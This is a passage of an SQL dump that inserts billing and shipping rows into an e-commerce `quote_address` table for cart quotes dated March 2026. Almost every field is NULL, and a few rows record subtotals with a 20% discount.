(1113, 740, '2026-03-29 05:22:02', '2026-03-29 05:22:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1114, 740, '2026-03-29 05:22:02', '2026-03-29 05:22:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1115, 741, '2026-03-29 08:07:17', '2026-03-29 08:07:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1116, 741, '2026-03-29 08:07:17', '2026-03-29 08:07:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1117, 742, '2026-03-29 11:17:08', '2026-03-29 11:17:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1118, 742, '2026-03-29 11:17:08', '2026-03-29 11:17:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1119, 743, '2026-03-29 11:41:36', '2026-03-29 11:41:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1120, 743, '2026-03-29 11:41:36', '2026-03-29 11:41:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1121, 744, '2026-03-29 11:41:42', '2026-03-29 11:41:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1122, 744, '2026-03-29 11:41:42', '2026-03-29 11:41:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1123, 745, '2026-03-29 11:41:43', '2026-03-29 11:41:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1124, 745, '2026-03-29 11:41:43', '2026-03-29 11:41:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1125, 746, '2026-03-29 11:41:45', '2026-03-29 11:41:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1126, 746, '2026-03-29 11:41:45', '2026-03-29 11:41:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1127, 747, '2026-03-29 11:41:46', '2026-03-29 11:41:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1128, 747, '2026-03-29 11:41:46', '2026-03-29 11:41:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1129, 748, '2026-03-29 11:41:48', '2026-03-29 11:41:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1130, 748, '2026-03-29 11:41:48', '2026-03-29 11:41:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1131, 749, '2026-03-29 11:41:49', '2026-03-29 11:41:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1132, 749, '2026-03-29 11:41:49', '2026-03-29 11:41:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1133, 750, '2026-03-29 11:41:51', '2026-03-29 11:41:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1134, 750, '2026-03-29 11:41:51', '2026-03-29 11:41:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1135, 751, '2026-03-29 11:41:52', '2026-03-29 11:41:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1136, 751, '2026-03-29 11:41:52', '2026-03-29 11:41:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1137, 752, '2026-03-29 11:41:54', '2026-03-29 11:41:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1138, 752, '2026-03-29 11:41:54', '2026-03-29 11:41:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1139, 753, '2026-03-29 11:41:55', '2026-03-29 11:41:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1140, 753, '2026-03-29 11:41:55', '2026-03-29 11:41:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1141, 754, '2026-03-29 11:41:56', '2026-03-29 11:41:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1142, 754, '2026-03-29 11:41:56', '2026-03-29 11:41:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1143, 755, '2026-03-29 11:41:58', '2026-03-29 11:41:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1144, 755, '2026-03-29 11:41:58', '2026-03-29 11:41:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1145, 756, '2026-03-29 11:42:06', '2026-03-29 11:42:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1146, 756, '2026-03-29 11:42:06', '2026-03-29 11:42:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1147, 757, '2026-03-29 11:42:12', '2026-03-29 11:42:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1148, 757, '2026-03-29 11:42:12', '2026-03-29 11:42:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1149, 758, '2026-03-29 11:42:17', '2026-03-29 11:42:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1150, 758, '2026-03-29 11:42:17', '2026-03-29 11:42:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1151, 759, '2026-03-29 11:42:22', '2026-03-29 11:42:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1152, 759, '2026-03-29 11:42:22', '2026-03-29 11:42:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1153, 760, '2026-03-29 11:42:27', '2026-03-29 11:42:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1154, 760, '2026-03-29 11:42:27', '2026-03-29 11:42:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1155, 761, '2026-03-29 15:42:21', '2026-03-29 15:42:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1156, 761, '2026-03-29 15:42:21', '2026-03-29 15:42:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1157, 762, '2026-03-29 18:29:31', '2026-03-29 18:29:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
